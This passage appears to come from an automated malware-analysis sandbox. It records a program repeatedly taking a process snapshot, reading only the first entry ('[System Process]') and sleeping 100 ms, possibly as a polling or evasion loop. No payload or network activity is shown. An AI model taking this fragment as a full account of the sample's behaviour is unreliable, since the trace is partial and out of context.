th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0260.354] Sleep (dwMilliseconds=0x64) [0260.456] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x740 [0260.458] Process32FirstW (in: hSnapshot=0x740, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0260.463] Sleep (dwMilliseconds=0x64) [0260.566] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x744 [0260.568] Process32FirstW (in: hSnapshot=0x744, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0260.574] Sleep (dwMilliseconds=0x64) [0260.675] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x748 [0260.677] Process32FirstW (in: hSnapshot=0x748, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0260.682] Sleep (dwMilliseconds=0x64) [0260.784] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x74c [0260.786] Process32FirstW (in: hSnapshot=0x74c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0260.791] Sleep (dwMilliseconds=0x64) [0260.895] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x750 [0260.896] Process32FirstW (in: hSnapshot=0x750, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0260.902] Sleep (dwMilliseconds=0x64) [0261.003] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x754 [0261.004] Process32FirstW (in: hSnapshot=0x754, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0261.010] Sleep (dwMilliseconds=0x64) [0261.113] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0261.115] Process32FirstW (in: hSnapshot=0x758, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0261.120] Sleep (dwMilliseconds=0x64) [0261.221] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x75c [0261.223] Process32FirstW (in: hSnapshot=0x75c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0261.229] Sleep (dwMilliseconds=0x64) [0261.330] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x760 [0261.332] Process32FirstW (in: hSnapshot=0x760, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0261.338] Sleep (dwMilliseconds=0x64) [0261.439] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x764 [0261.441] Process32FirstW (in: hSnapshot=0x764, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0261.447] Sleep (dwMilliseconds=0x64) [0261.558] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x768 [0261.560] Process32FirstW (in: hSnapshot=0x768, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0261.566] Sleep (dwMilliseconds=0x64) [0261.673] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x76c [0261.675] Process32FirstW (in: hSnapshot=0x76c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0261.680] Sleep (dwMilliseconds=0x64) [0261.783] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x770 [0261.784] Process32FirstW (in: hSnapshot=0x770, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0261.790] Sleep (dwMilliseconds=0x64) [0261.892] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x774 [0261.894] Process32FirstW (in: hSnapshot=0x774, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0261.899] Sleep (dwMilliseconds=0x64) [0262.001] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x778 [0262.003] Process32FirstW (in: hSnapshot=0x778, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0262.008] Sleep (dwMilliseconds=0x64) [0262.111] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x77c [0262.113] Process32FirstW (in: hSnapshot=0x77c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0262.120] Sleep (dwMilliseconds=0x64) [0262.219] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x780 [0262.221] Process32FirstW (in: hSnapshot=0x780, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0262.226] Sleep (dwMilliseconds=0x64) [0262.328] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x784 [0262.330] Process32FirstW (in: hSnapshot=0x784, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0262.336] Sleep (dwMilliseconds=0x64) [0262.438] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x788 [0262.439] Process32FirstW (in: hSnapshot=0x788, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0262.445] Sleep (dwMilliseconds=0x64) [0262.547] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x78c [0262.549] Process32FirstW (in: hSnapshot=0x78c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0262.554] Sleep (dwMilliseconds=0x64) [0262.656] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x790 [0262.658] Process32FirstW (in: hSnapshot=0x790, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0262.663] Sleep (dwMilliseconds=0x64) [0262.765] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x794 [0262.767] Process32FirstW (in: hSnapshot=0x794, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0262.772] Sleep (dwMilliseconds=0x64) [0262.875] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x798 [0262.876] Process32FirstW (in: hSnapshot=0x798, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0262.882] Sleep (dwMilliseconds=0x64) [0262.984] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x79c [0262.986] Process32FirstW (in: hSnapshot=0x79c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0262.991] Sleep (dwMilliseconds=0x64) [0263.094] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x7a0 [0263.096] Process32FirstW (in: hSnapshot=0x7a0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0263.104] Sleep (dwMilliseconds=0x64) [0263.202] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x7a4 [0263.204] Process32FirstW (in: hSnapshot=0x7a4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0263.209] Sleep (dwMilliseconds=0x64) [0263.311] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x7a8 [0263.313] Process32FirstW (in: hSnapshot=0x7a8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0263.319] Sleep (dwMilliseconds=0x64) [0263.421] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x7ac [0263.422] Process32FirstW (in: hSnapshot=0x7ac, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0263.428] Sleep (dwMilliseconds=0x64) [0263.530] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x7b0 [0263.531] Process32FirstW (in: hSnapshot=0x7b0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0263.537] Sleep (dwMilliseconds=0x64) [0263.639] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x7b4 [0263.641] Process32FirstW (in: hSnapshot=0x7b4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0263.646] Sleep (dwMilliseconds=0x64) [0263.748] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x7b8 [0263.750] Process32FirstW (in: hSnapshot=0x7b8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0263.755] Sleep (dwMilliseconds=0x64) [0263.860] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x7bc [0263.862] Process32FirstW (in: hSnapshot=0x7bc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0263.868] Sleep (dwMilliseconds=0x64) [0263.967] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x7c0 [0263.968] Process32FirstW (in: hSnapshot=0x7c0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0263.974] Sleep (dwMilliseconds=0x64) [0264.076] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x7c4 [0264.077] Process32FirstW (in: hSnapshot=0x7c4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0264.083] Sleep (dwMilliseconds=0x64) [0264.186] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x7c8 [0264.188] Process32FirstW (in: hSnapshot=0x7c8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0264.193] Sleep (dwMilliseconds=0x64) [0264.299] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x7cc [0264.301] Process32FirstW (in: hSnapshot=0x7cc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0264.306] Sleep (dwMilliseconds=0x64) [0264.403] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x7d0 [0264.405] Process32FirstW (in: hSnapshot=0x7d0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0264.410] Sleep (dwMilliseconds=0x64) [0264.512] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x7d4 [0264.514] Process32FirstW (in: hSnapshot=0x7d4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0264.519] Sleep (dwMilliseconds=0x64) [0264.622] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x7d8 [0264.623] Process32FirstW (in: hSnapshot=0x7d8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0264.629] Sleep (dwMilliseconds=0x64) [0264.731] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x7dc [0264.733] Process32FirstW (in: hSnapshot=0x7dc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0264.738] Sleep (dwMilliseconds=0x64) [0264.840] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x7e0 [0264.842] Process32FirstW (in: hSnapshot=0x7e0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0264.847] Sleep (dwMilliseconds=0x64) [0264.950] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x7e4 [0264.952] Process32FirstW (in: hSnapshot=0x7e4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0264.958] Sleep (dwMilliseconds=0x64) [0265.058] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x7e8 [0265.060] Process32FirstW (in: hSnapshot=0x7e8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0265.066] Sleep (dwMilliseconds=0x64) [0265.168] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x7ec [0265.169] Process32FirstW (in: hSnapshot=0x7ec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0265.175] Sleep (dwMilliseconds=0x64) [0265.277] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x7f0 [0265.278] Process32FirstW (in: hSnapshot=0x7f0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0265.284] Sleep (dwMilliseconds=0x64) [0265.386] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x7f4 [0265.388] Process32FirstW (in: hSnapshot=0x7f4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0265.393] Sleep (dwMilliseconds=0x64) [0265.496] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x7f8 [0265.497] Process32FirstW (in: hSnapshot=0x7f8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0265.503] Sleep (dwMilliseconds=0x64) [0265.605] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x7fc [0265.606] Process32FirstW (in: hSnapshot=0x7fc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0265.612] Sleep (dwMilliseconds=0x64) [0265.714] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x804 [0265.716] Process32FirstW (in: hSnapshot=0x804, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0265.723] Sleep (dwMilliseconds=0x64) [0265.823] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x808 [0265.825] Process32FirstW (in: hSnapshot=0x808, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0265.832] Sleep (dwMilliseconds=0x64) [0265.932] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x80c [0265.934] Process32FirstW (in: hSnapshot=0x80c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0265.940] Sleep (dwMilliseconds=0x64) [0266.041] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x810 [0266.043] Process32FirstW (in: hSnapshot=0x810, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0266.049] Sleep (dwMilliseconds=0x64) [0266.150] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x814 [0266.152] Process32FirstW (in: hSnapshot=0x814, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0266.157] Sleep (dwMilliseconds=0x64) [0266.260] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x818 [0266.261] Process32FirstW (in: hSnapshot=0x818, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0266.267] Sleep (dwMilliseconds=0x64) [0266.369] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x81c [0266.370] Process32FirstW (in: hSnapshot=0x81c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0266.376] Sleep (dwMilliseconds=0x64) [0266.478] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x820 [0266.480] Process32FirstW (in: hSnapshot=0x820, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0266.485] Sleep (dwMilliseconds=0x64) [0266.587] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x824 [0266.589] Process32FirstW (in: hSnapshot=0x824, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0266.594] Sleep (dwMilliseconds=0x64) [0266.697] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x828 [0266.698] Process32FirstW (in: hSnapshot=0x828, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0266.704] Sleep (dwMilliseconds=0x64) [0266.806] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x82c [0266.807] Process32FirstW (in: hSnapshot=0x82c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0266.813] Sleep (dwMilliseconds=0x64) [0266.939] 